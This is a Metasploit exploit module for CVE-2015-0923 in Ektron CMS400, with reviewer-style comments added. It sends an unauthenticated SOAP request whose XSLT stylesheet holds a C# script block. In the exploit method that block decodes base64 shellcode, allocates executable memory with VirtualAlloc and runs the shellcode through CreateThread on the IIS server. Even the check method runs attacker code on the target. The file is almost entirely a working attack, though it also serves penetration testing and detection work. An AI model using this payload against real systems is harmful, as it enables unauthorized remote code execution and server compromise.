##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Ektron CMS400 8.5 / 8.7 <= sp1 / 9.0 < sp1: unauthenticated remote code
# execution through attacker-supplied XSLT handed to ServerControlWS.asmx
# (CVE-2015-0923, US-CERT VU#377644).
#
# Every request this module sends is a SOAP POST to
# <TARGETURI>WorkArea/ServerControlWS.asmx whose body wraps an XSLT 2.0
# stylesheet carrying an msxsl:script C# block. Both check and exploit rely
# on that block being run server-side when the transform is applied, which
# is why check is intrusive (see its comment). The request shape — POST,
# Content-Type text/xml, Referer built from the target host, a CDATA-wrapped
# <xsl:transform> in the SOAP body — is the same for both, which is useful
# when writing a single detection for this module.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  # Module metadata and user-facing options.
  #
  # Options registered here:
  # - TARGETURI:  base path of the CMS; uri_path normalises it to end in "/".
  # - TARGETOP:   which ServerControlWS.asmx operation carries the transform.
  #               vulnerable_param and required_params branch on this value.
  # - HTTP_DELAY: registered but never read — nothing in this file references
  #               datastore['HTTP_DELAY'], and its description talks about a
  #               VBS payload this module does not use. Looks like a leftover
  #               from an earlier version; worth removing or wiring up.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Ektron 8.5, 8.7, 9.0 XSLT Transform Remote Code Execution',
        'Description' => %q{
          Ektron 8.5, 8.7 <= sp1, 9.0 < sp1 have
          vulnerabilities in various operations within the ServerControlWS.asmx
          web services. These vulnerabilities allow for RCE without authentication and
          execute in the context of IIS on the remote system.
        },
        'Author' => [
          'catatonicprime'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2015-0923' ],
          [ 'US-CERT-VU', '377644' ],
          [ 'URL', 'http://www.websecuritywatch.com/xxe-arbitrary-code-execution-in-ektron-cms/' ]
        ],
        'Payload' => {
          'Space' => 2048,
          'StackAdjustment' => -3500
        },
        'Platform' => 'win',
        # Per the description above, execution happens in the IIS context.
        'Privileged' => true,
        'Targets' => [
          ['Windows 2008 R2 / Ektron CMS400 8.5', { 'Arch' => [ ARCH_X64, ARCH_X86 ] }]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2015-02-05',
        # NOTE(review): all three notes are left UNKNOWN. At minimum SideEffects
        # should record that the check method executes a script block on the
        # target rather than probing passively (see check).
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60]),
        OptString.new('TARGETURI', [true, 'The URI path of the Ektron CMS', '/cms400min/']),
        OptEnum.new('TARGETOP',
          [
            true,
            'The vulnerable web service operation to exploit',
            'ContentBlockEx',
            [
              'ContentBlockEx',
              'GetBookmarkString',
              'GetContentFlaggingString',
              'GetContentRatingString',
              'GetMessagingString'
            ]
          ])
      ]
    )
  end

  # Name of the SOAP child element that receives the stylesheet.
  #
  # ContentBlockEx spells it 'Xslt'; every other selectable operation uses
  # lowercase 'xslt'. The element name is case-sensitive XML, so this
  # distinction is what makes the transform land in the right parameter.
  # @return [String]
  def vulnerable_param
    return 'Xslt' if datastore['TARGETOP'] == 'ContentBlockEx'

    'xslt'
  end

  # Extra child element some operations require before the stylesheet.
  #
  # Empty for ContentBlockEx; the Get*String operations get an empty
  # <showmode/> element. Nothing here is user-controlled.
  # @return [String]
  def required_params
    return '' if datastore['TARGETOP'] == 'ContentBlockEx'

    '<showmode/>'
  end

  # The ServerControlWS.asmx operation selected via TARGETOP.
  # @return [String] one of the values enumerated in initialize
  def target_operation
    datastore['TARGETOP']
  end

  # Opening half of the SOAP/XSLT request body.
  #
  # Wraps an XSLT 2.0 transform (inside CDATA) in the selected operation's
  # element, with the stylesheet placed in the element named by
  # vulnerable_param and any required sibling from required_params. The
  # transform is left open inside an msxsl:script C# block so the caller
  # can append C# method bodies; epilogue closes everything.
  # @return [String]
  def prologue
    <<~XSLT
      <?xml version="1.0" encoding="utf-8"?>
      <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
      <soap:Body>
      <#{target_operation} xmlns="http://www.ektron.com/CMS400/Webservice">
      #{required_params}
      <#{vulnerable_param}>
      <![CDATA[
      <xsl:transform version="2.0"
      xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
      xmlns:msxsl="urn:schemas-microsoft-com:xslt"
      xmlns:user="http://mycompany.com/mynamespace">
      <msxsl:script language="C#" implements-prefix="user">
    XSLT
  end

  # Closing half of the SOAP/XSLT request body.
  #
  # Closes the script block, adds the root template that calls the script's
  # user:xml() function (so whatever xml() returns becomes the transform
  # output, and hence part of the HTTP response), then closes the CDATA,
  # the operation element and the SOAP envelope. Must pair with prologue.
  # @return [String]
  def epilogue
    <<~XSLT
      </msxsl:script>
      <xsl:template match="/">
      <xsl:value-of select="user:xml()"/>
      </xsl:template>
      </xsl:transform>
      ]]>
      </#{vulnerable_param}>
      </#{target_operation}>
      </soap:Body>
      </soap:Envelope>
    XSLT
  end

  # Active vulnerability check.
  #
  # This is not a passive probe: it submits a transform whose C# script
  # block returns a random fingerprint, so a Vulnerable verdict means the
  # target already compiled and executed attacker-supplied code once.
  # Success heuristic: HTTP 200, the fingerprint echoed in the body, and
  # no "Error" substring anywhere in the body. The last test is coarse —
  # a response that happens to contain "Error" elsewhere reports Safe
  # (false negative). The fingerprint comes from rand_text_alpha, so it is
  # alphabetic and safe to interpolate into a Regexp.
  # @return [Exploit::CheckCode] Vulnerable or Safe; never Unknown, even on
  #   a nil response (no connection is reported as Safe)
  def check
    fingerprint = rand_text_alpha(5 + rand(5))
    xslt_data = <<~XSLT
      #{prologue}
      public string xml() {
      return "#{fingerprint}";
      }
      #{epilogue}
    XSLT

    res = send_request_cgi(
      {
        'uri' => "#{uri_path}WorkArea/ServerControlWS.asmx",
        'version' => '1.1',
        'method' => 'POST',
        'ctype' => "text/xml; charset=UTF-8",
        'headers' => {
          "Referer" => build_referer
        },
        'data' => xslt_data
      }
    )

    if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  # TARGETURI path with a guaranteed trailing "/".
  #
  # Appends in place (<<) to the String returned by target_uri.path; the
  # guard makes repeated calls idempotent even if that String were shared.
  # The local variable shadows the method name, which is legal Ruby but easy
  # to misread.
  # @return [String]
  def uri_path
    uri_path = target_uri.path
    uri_path << "/" if uri_path[-1, 1] != "/"
    uri_path
  end

  # Referer header value: scheme://rhost:rport<uri_path>.
  #
  # The scheme follows the SSL option. NOTE(review): rhost is concatenated
  # verbatim, so an IPv6 literal would not be bracketed — confirm whether the
  # server's Referer handling cares before relying on this against such hosts.
  # @return [String]
  def build_referer
    if datastore['SSL']
      schema = "https://"
    else
      schema = "http://"
    end

    referer = schema
    referer << rhost
    referer << ":#{rport}"
    referer << uri_path
    referer
  end

  # Delivers the payload.
  #
  # Same request as check, but the C# script block now embeds the encoded
  # payload as a base64 string literal and runs it from xml() before
  # returning the fingerprint. Two caveats a reviewer should know:
  # - xml() returns the fingerprint unconditionally and never inspects the
  #   handle it gets from CreateThread, so "Exploitation was successful"
  #   only proves the script block ran, not that the payload thread started.
  # - The success test reuses check's heuristic, including the coarse
  #   "no 'Error' in body" condition, with the same false-negative risk.
  # Everything inside the heredoc is sent verbatim (including the odd
  # spacing in the Marshal.Copy call); it is a runtime string, not Ruby.
  # @raise [Msf::Exploit::Failed] via fail_with on any non-matching response
  def exploit
    print_status("Generating the EXE Payload and the XSLT...")
    fingerprint = rand_text_alpha(5 + rand(5))

    xslt_data = <<~XSLT
      #{prologue}
      private static UInt32 MEM_COMMIT = 0x1000;
      private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

      [System.Runtime.InteropServices.DllImport("kernel32")]
      private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

      [System.Runtime.InteropServices.DllImport("kernel32")]
      private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);

      public string xml()
      {
      string shellcode64 = @"#{Rex::Text.encode_base64(payload.encoded)}";
      byte[] shellcode = System.Convert.FromBase64String(shellcode64);
      UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
      System.Runtime.InteropServices.Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);
      IntPtr hThread = IntPtr.Zero;
      IntPtr pinfo = IntPtr.Zero;
      UInt32 threadId = 0;
      hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
      return "#{fingerprint}";
      }
      #{epilogue}
    XSLT

    print_status("Trying to run the xslt transformation...")
    res = send_request_cgi(
      {
        'uri' => "#{uri_path}WorkArea/ServerControlWS.asmx",
        'version' => '1.1',
        'method' => 'POST',
        'ctype' => "text/xml; charset=UTF-8",
        'headers' => {
          "Referer" => build_referer
        },
        'data' => xslt_data
      }
    )
    if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
      print_good("Exploitation was successful")
    else
      fail_with(Failure::Unknown, "There was an unexpected response to the xslt transformation request")
    end
  end
end